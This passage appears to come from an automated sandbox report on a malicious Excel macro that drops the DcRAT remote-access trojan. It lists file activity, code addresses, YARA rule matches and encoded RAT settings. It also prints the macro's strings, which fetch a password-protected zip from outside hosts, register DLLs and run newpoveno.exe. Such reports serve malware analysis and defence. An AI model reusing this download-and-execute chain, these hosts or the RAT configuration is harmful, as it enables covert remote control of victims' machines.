                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\w3d3pmb2.newcfg
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\m5gid2hn.tmp
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\m5gid2hn.newcfg
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\accgnjiz.tmp
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\accgnjiz.newcfg
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\z2j5hc2t.tmp
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\z2j5hc2t.newcfg
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\et4lifhj.tmp
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\et4lifhj.newcfg
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\xzxwmyez.tmp
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\xzxwmyez.newcfg
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\khv5ie0a.tmp
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\khv5ie0a.newcfg
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\lfeaovex.tmp
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\lfeaovex.newcfg
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir7228_226220927
                            Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIC5F8.tmp
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FF727F8A8A08_2_00007FF727F8A8A0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FF727F861A08_2_00007FF727F861A0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FF727F876008_2_00007FF727F87600
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FF727F89D108_2_00007FF727F89D10
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA209003008_2_00007FFA20900300
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208DE6E08_2_00007FFA208DE6E0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208F48808_2_00007FFA208F4880
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208F31908_2_00007FFA208F3190
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208E32908_2_00007FFA208E3290
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208CA1D08_2_00007FFA208CA1D0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208D83008_2_00007FFA208D8300
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208F74508_2_00007FFA208F7450
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208EE4708_2_00007FFA208EE470
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208F95F08_2_00007FFA208F95F0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208CC6108_2_00007FFA208CC610
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA209F66D08_2_00007FFA209F66D0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208E47218_2_00007FFA208E4721
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208F8B408_2_00007FFA208F8B40
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208F1B308_2_00007FFA208F1B30
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208F5CB08_2_00007FFA208F5CB0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208F3BD08_2_00007FFA208F3BD0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208CECC08_2_00007FFA208CECC0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208D8F808_2_00007FFA208D8F80
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208F7FB08_2_00007FFA208F7FB0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208E4EF08_2_00007FFA208E4EF0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA20C881738_2_00007FFA20C88173
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA20E10C208_2_00007FFA20E10C20
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA20F7AEA08_2_00007FFA20F7AEA0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA20D85C508_2_00007FFA20D85C50
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF9C04030E910_2_00007FF9C04030E9
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 12_2_02EA26F812_2_02EA26F8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 12_2_02EA26E712_2_02EA26E7
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 12_2_02EA2E7212_2_02EA2E72
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FF6CFFBA8A022_2_00007FF6CFFBA8A0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FF6CFFB61A022_2_00007FF6CFFB61A0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FF6CFFB760022_2_00007FF6CFFB7600
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FF6CFFB9D1022_2_00007FF6CFFB9D10
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FFA1636472122_2_00007FFA16364721
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FFA164766D022_2_00007FFA164766D0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FFA1634C61022_2_00007FFA1634C610
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FFA1635830022_2_00007FFA16358300
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FFA1637745022_2_00007FFA16377450
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FFA1634A1D022_2_00007FFA1634A1D0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FFA1636329022_2_00007FFA16363290
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FFA16364EF022_2_00007FFA16364EF0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FFA16358F8022_2_00007FFA16358F80
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FFA1634ECC022_2_00007FFA1634ECC0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FFA16373BD022_2_00007FFA16373BD0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FFA1670817322_2_00007FFA16708173
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FFA169FBF4022_2_00007FFA169FBF40
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FFA169FBFE022_2_00007FFA169FBFE0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FFA169FAEA022_2_00007FFA169FAEA0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FFA16890C2022_2_00007FFA16890C20
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_0181270024_2_01812700
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_018126EF24_2_018126EF
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_01812E7A24_2_01812E7A
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FF6CFFBA8A027_2_00007FF6CFFBA8A0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FF6CFFB61A027_2_00007FF6CFFB61A0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FF6CFFB760027_2_00007FF6CFFB7600
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FF6CFFB9D1027_2_00007FF6CFFB9D10
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFAA1D027_2_00007FFA1FFAA1D0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFC329027_2_00007FFA1FFC3290
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFB830027_2_00007FFA1FFB8300
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFD745027_2_00007FFA1FFD7450
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFAC61027_2_00007FFA1FFAC610
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA200D66D027_2_00007FFA200D66D0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFC472127_2_00007FFA1FFC4721
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFD3BD027_2_00007FFA1FFD3BD0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFAECC027_2_00007FFA1FFAECC0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFC4EF027_2_00007FFA1FFC4EF0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFB8F8027_2_00007FFA1FFB8F80
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA20C8817327_2_00007FFA20C88173
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA20E10C2027_2_00007FFA20E10C20
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA20F7AEA027_2_00007FFA20F7AEA0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA20F7BFE027_2_00007FFA20F7BFE0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA20F7BF4027_2_00007FFA20F7BF40
                            Source: Document25.xlsmOLE, VBA macro line: Private Sub Workbook_Open()
                            Source: Document25.xlsmOLE, VBA macro line: Private Sub Workbook_Open()
                            Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function Workbook_OpenName: Workbook_Open
                            Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_OpenName: Workbook_Open
                            Source: Document25.xlsmOLE indicator, VBA macros: true
                            Source: Document25.xlsmStream path 'VBA/__SRP_0' : https://tursiian.com/7z.txt$7zip_installer.exe/S47-Zip installation failed!8ZIP file failed to download!2(7-Zip installed at:* 7-Zip found at:(newpoveno.zip+vhttps://f005.backblazeb2.com/file/newuploavir/newpoveno.zit&ZIP downloaded to:* x -p123456 -y -oba).a(Extraction command:$*.*"Extracted files:$,,libcares-2.dll"nasrallah_x86.dll vcruntime210.dllnewpoveno.exe"-#Z00:00:010c>vcruntime210.dll not found at: .aFF!1Q1&mQ1@nasrallah_x86.dll not found at:$cmdViewInvoice@2iw<W2QRetry(: DLL exists=, EXE exists=:libcares-2.dll not found at: 6msvcp290.dll not found at:$Yl|8newpoveno.exe not found at:* Files verified:$ and(regsvr32.exe/s.2DLL registration output: LDLL registration attempted (no output).EXE execution attemptedEXE output:(WScript.Shell<Z>Z"Cleanup com
                            Source: C:\Program Files\7-Zip\7z.exeProcess token adjusted: SecurityJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: String function: 00007FFA208CB4E0 appears 51 times
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: String function: 00007FFA1634B4E0 appears 51 times
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: String function: 00007FF6CFFB7200 appears 32 times
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: String function: 00007FFA1FFAB4E0 appears 51 times
                            Source: Document.exe.12.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: Document.exe.12.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: Document.exe.12.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: Document.exe.12.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: Document.exe.12.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: newpoveno.exe.5.drStatic PE information: Number of sections : 11 > 10
                            Source: newpoveno.exe.8.drStatic PE information: Number of sections : 11 > 10
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                            Source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 37.0.Document.exe.7dc3d4.1.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                            Source: 37.2.Document.exe.55d0000.7.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, Settings.csBase64 encoded string: 'vmxWSASsER9qtfIwb2UCT2U29glm9qmaRh3bKMh5ba/+8jTxv6tLY3RW18l2+vskxxEI+R2o0a8hiaAkCYpZcQ==', 'jRssRHPasO7sqjIYVlNThUsPcH2m6aMobAkPX7ADcwY4u7St98QWcPhJ6BACRFqDuBEStPpmqLG3xsRjojDMahsWBkpMziG7s9L9/rlBV9d87pJcFcSrM+ACsDBGLaWC', 'ZnZ2C9KFSvHXslpF8qaNa4cNLrqwPLzUhCx3YAsccyPVKid7hXwLsMVRunyRa0b/SQxCHKYPWUFT57XVxIdZEw==', 'uprcwSUKHiIzexZEwbmwGjB94R+mGTooxeFdGk6IuiTR3vxra9top0nkB3InsnkUuz76a7RmzuszEK83Mne1wg3vGclyk1x91il6A2sIzEPj93fdoGDDIa1GcJoJ22UNkJtWtqnt5ymASQsO0d/w0Wp9did7rxphmWpPFTCpLDOH0ec7J47grwPlKHSlXZVkALgN/WrJR+ZAiXwG05QKLqrGx/5Jji0ZG91DNjwRzfW9gYRx46Ms9iYAODf4m/+np2y237hHYsnpy2tqydfbVYTuCjtSdYV3L5FUmOc8ZQhdlKqmWPBp/h0XWEqN1r73QHduvL672cgfEz7LMBENSzM/Z2DNGQa6Zvla3SvlpKcDxaIncLKCUFZH0UrlApWGggxd38/fEIOlxJXXixcO2dV4yBgjo/1P7nnd4oKUBZ6inVoF/MZMe4wIVKA4JmO5QeHxcJgsOx/0FD0c0i2cSkB0WLawOdFOEDvK6R080DNA/zv5XcVTYkrNppG2PiRXDVUvXpZ9PIywHiaIDjFjSES5508WUWk4kSx05vRAPkJJsB1gRbF88ygOfn3Rk63ZdQIfd6tv3KJcGKnV2u53dtPIyRq8Fa0PkShE4bRD2bl4SR8ExfdEmkdSprphvy6nUr78+BKO1Pg0gqZDZ05mPDKZBKH2hQ2JS1Xz/mg+ZFybqPobnANi9S4ClMpH/hpj8973ShWlCy92o3v7MBvqtV/uZG5MlOHtI8EDGSJmU9PPd4uBcyKWlqkb13K/YB9anKd3sGYVnPsXqgWFn9yLPXeKs4VPlsmko8XWSijcWsrj9nwdoR07wihPyTloZqGWIP66W4m1SPOAGz7AkgHCncQ/ymQAjX3KEUUi+VLUX25CMQbTbrnRKDdAFjzdNa1/w+p9DJ+ubLORLfXeTIBaYNn7OZduqsOV3nNJwKNgmSSkSY/pE1Xkdjyrf/BMfXTVRVab7ju/UoJ5XQMkKzsCEGOTYbj1u6j6gcGuwujk0QKk8DdpMEpcF4VMC/j8ray4hxF1ep5f0sk7xp7A2As+XrzkhRkaB6qQvmLgAUON/5NeJthKXyDcOr6iclhyFxsv', 'yCCq4SfC3sqs64eIBomN0shmCaypDC3cQBAYOs5HyoCxTMxsW+PNGsFzWZfJEZw8qk8Il+wTPXXEUvIkQ3gH7A=='
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, Settings.csBase64 encoded string: 'vmxWSASsER9qtfIwb2UCT2U29glm9qmaRh3bKMh5ba/+8jTxv6tLY3RW18l2+vskxxEI+R2o0a8hiaAkCYpZcQ==', 'jRssRHPasO7sqjIYVlNThUsPcH2m6aMobAkPX7ADcwY4u7St98QWcPhJ6BACRFqDuBEStPpmqLG3xsRjojDMahsWBkpMziG7s9L9/rlBV9d87pJcFcSrM+ACsDBGLaWC', 'ZnZ2C9KFSvHXslpF8qaNa4cNLrqwPLzUhCx3YAsccyPVKid7hXwLsMVRunyRa0b/SQxCHKYPWUFT57XVxIdZEw==', 'uprcwSUKHiIzexZEwbmwGjB94R+mGTooxeFdGk6IuiTR3vxra9top0nkB3InsnkUuz76a7RmzuszEK83Mne1wg3vGclyk1x91il6A2sIzEPj93fdoGDDIa1GcJoJ22UNkJtWtqnt5ymASQsO0d/w0Wp9did7rxphmWpPFTCpLDOH0ec7J47grwPlKHSlXZVkALgN/WrJR+ZAiXwG05QKLqrGx/5Jji0ZG91DNjwRzfW9gYRx46Ms9iYAODf4m/+np2y237hHYsnpy2tqydfbVYTuCjtSdYV3L5FUmOc8ZQhdlKqmWPBp/h0XWEqN1r73QHduvL672cgfEz7LMBENSzM/Z2DNGQa6Zvla3SvlpKcDxaIncLKCUFZH0UrlApWGggxd38/fEIOlxJXXixcO2dV4yBgjo/1P7nnd4oKUBZ6inVoF/MZMe4wIVKA4JmO5QeHxcJgsOx/0FD0c0i2cSkB0WLawOdFOEDvK6R080DNA/zv5XcVTYkrNppG2PiRXDVUvXpZ9PIywHiaIDjFjSES5508WUWk4kSx05vRAPkJJsB1gRbF88ygOfn3Rk63ZdQIfd6tv3KJcGKnV2u53dtPIyRq8Fa0PkShE4bRD2bl4SR8ExfdEmkdSprphvy6nUr78+BKO1Pg0gqZDZ05mPDKZBKH2hQ2JS1Xz/mg+ZFybqPobnANi9S4ClMpH/hpj8973ShWlCy92o3v7MBvqtV/uZG5MlOHtI8EDGSJmU9PPd4uBcyKWlqkb13K/YB9anKd3sGYVnPsXqgWFn9yLPXeKs4VPlsmko8XWSijcWsrj9nwdoR07wihPyTloZqGWIP66W4m1SPOAGz7AkgHCncQ/ymQAjX3KEUUi+VLUX25CMQbTbrnRKDdAFjzdNa1/w+p9DJ+ubLORLfXeTIBaYNn7OZduqsOV3nNJwKNgmSSkSY/pE1Xkdjyrf/BMfXTVRVab7ju/UoJ5XQMkKzsCEGOTYbj1u6j6gcGuwujk0QKk8DdpMEpcF4VMC/j8ray4hxF1ep5f0sk7xp7A2As+XrzkhRkaB6qQvmLgAUON/5NeJthKXyDcOr6iclhyFxsv', 'yCCq4SfC3sqs64eIBomN0shmCaypDC3cQBAYOs5HyoCxTMxsW+PNGsFzWZfJEZw8qk8Il+wTPXXEUvIkQ3gH7A=='
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, Settings.csBase64 encoded string: 'vmxWSASsER9qtfIwb2UCT2U29glm9qmaRh3bKMh5ba/+8jTxv6tLY3RW18l2+vskxxEI+R2o0a8hiaAkCYpZcQ==', 'jRssRHPasO7sqjIYVlNThUsPcH2m6aMobAkPX7ADcwY4u7St98QWcPhJ6BACRFqDuBEStPpmqLG3xsRjojDMahsWBkpMziG7s9L9/rlBV9d87pJcFcSrM+ACsDBGLaWC', 'ZnZ2C9KFSvHXslpF8qaNa4cNLrqwPLzUhCx3YAsccyPVKid7hXwLsMVRunyRa0b/SQxCHKYPWUFT57XVxIdZEw==', 'uprcwSUKHiIzexZEwbmwGjB94R+mGTooxeFdGk6IuiTR3vxra9top0nkB3InsnkUuz76a7RmzuszEK83Mne1wg3vGclyk1x91il6A2sIzEPj93fdoGDDIa1GcJoJ22UNkJtWtqnt5ymASQsO0d/w0Wp9did7rxphmWpPFTCpLDOH0ec7J47grwPlKHSlXZVkALgN/WrJR+ZAiXwG05QKLqrGx/5Jji0ZG91DNjwRzfW9gYRx46Ms9iYAODf4m/+np2y237hHYsnpy2tqydfbVYTuCjtSdYV3L5FUmOc8ZQhdlKqmWPBp/h0XWEqN1r73QHduvL672cgfEz7LMBENSzM/Z2DNGQa6Zvla3SvlpKcDxaIncLKCUFZH0UrlApWGggxd38/fEIOlxJXXixcO2dV4yBgjo/1P7nnd4oKUBZ6inVoF/MZMe4wIVKA4JmO5QeHxcJgsOx/0FD0c0i2cSkB0WLawOdFOEDvK6R080DNA/zv5XcVTYkrNppG2PiRXDVUvXpZ9PIywHiaIDjFjSES5508WUWk4kSx05vRAPkJJsB1gRbF88ygOfn3Rk63ZdQIfd6tv3KJcGKnV2u53dtPIyRq8Fa0PkShE4bRD2bl4SR8ExfdEmkdSprphvy6nUr78+BKO1Pg0gqZDZ05mPDKZBKH2hQ2JS1Xz/mg+ZFybqPobnANi9S4ClMpH/hpj8973ShWlCy92o3v7MBvqtV/uZG5MlOHtI8EDGSJmU9PPd4uBcyKWlqkb13K/YB9anKd3sGYVnPsXqgWFn9yLPXeKs4VPlsmko8XWSijcWsrj9nwdoR07wihPyTloZqGWIP66W4m1SPOAGz7AkgHCncQ/ymQAjX3KEUUi+VLUX25CMQbTbrnRKDdAFjzdNa1/w+p9DJ+ubLORLfXeTIBaYNn7OZduqsOV3nNJwKNgmSSkSY/pE1Xkdjyrf/BMfXTVRVab7ju/UoJ5XQMkKzsCEGOTYbj1u6j6gcGuwujk0QKk8DdpMEpcF4VMC/j8ray4hxF1ep5f0sk7xp7A2As+XrzkhRkaB6qQvmLgAUON/5NeJthKXyDc